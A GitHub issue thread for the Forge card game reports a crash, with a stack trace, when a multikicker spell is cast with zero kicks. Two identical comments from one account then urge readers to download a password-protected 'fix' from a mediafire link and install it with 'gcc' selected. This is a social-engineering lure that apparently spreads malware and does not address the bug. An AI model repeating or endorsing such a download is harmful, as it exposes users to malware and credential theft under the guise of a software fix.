### ISSUE TITLE
Playing a card multikicker but selecting 0 for the number of times kicked crashes the application

### ISSUE THREAD

**Issue by hovergoat** [Card-Forge/forge#5996]
**Describe the bug**
When playing any card with multikicker, if no multikicker cost is paid, the application crashes. This also triggers when the AI plays a multikicker card without paying the multikicker cost.

**To Reproduce**
1. Play the spell [Gnarlid Pack](https://gatherer.wizards.com/Pages/Card/Details.aspx?multiverseid=397863)
    NOTE: Any card with multikicker works
2. You will be prompted with 'Choose Amount for Multikicker: [1][G]'
3. Select 0 and press OK
4. The application crashes with the following crash stack

java.lang.NullPointerException: Cannot invoke "forge.game.spellability.SpellAbility.setOptionalKeywordAmount(forge.game.keyword.KeywordInterface, int)" because "result" is null
	at forge.game.GameActionUtil.addExtraKeywordCost(GameActionUtil.java:623)
	at forge.player.HumanPlaySpellAbility.playAbility(HumanPlaySpellAbility.java:117)
	at forge.player.HumanPlay.playSpellAbility(HumanPlay.java:106)
	at forge.player.PlayerControllerHuman.playChosenSpellAbility(PlayerControllerHuman.java:1509)
	at forge.game.phase.PhaseHandler.startFirstTurn(PhaseHandler.java:1055)
	at forge.game.GameAction.startGame(GameAction.java:2152)
	at forge.game.Match.startGame(Match.java:90)
	at forge.gamemodes.match.HostedMatch.lambda$startGame$1(HostedMatch.java:269)
	at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1144)
	at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:642)
	at java.base/java.lang.Thread.run(Thread.java:1570)

**Expected behavior**
The application does not crash and the card is played for the 0 value multikicker cost

**Desktop (please complete the following information):**
 - OS: Windows 10
 - Browser: Chrome
 - Version: 1.6.65-SNAPSHOT

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
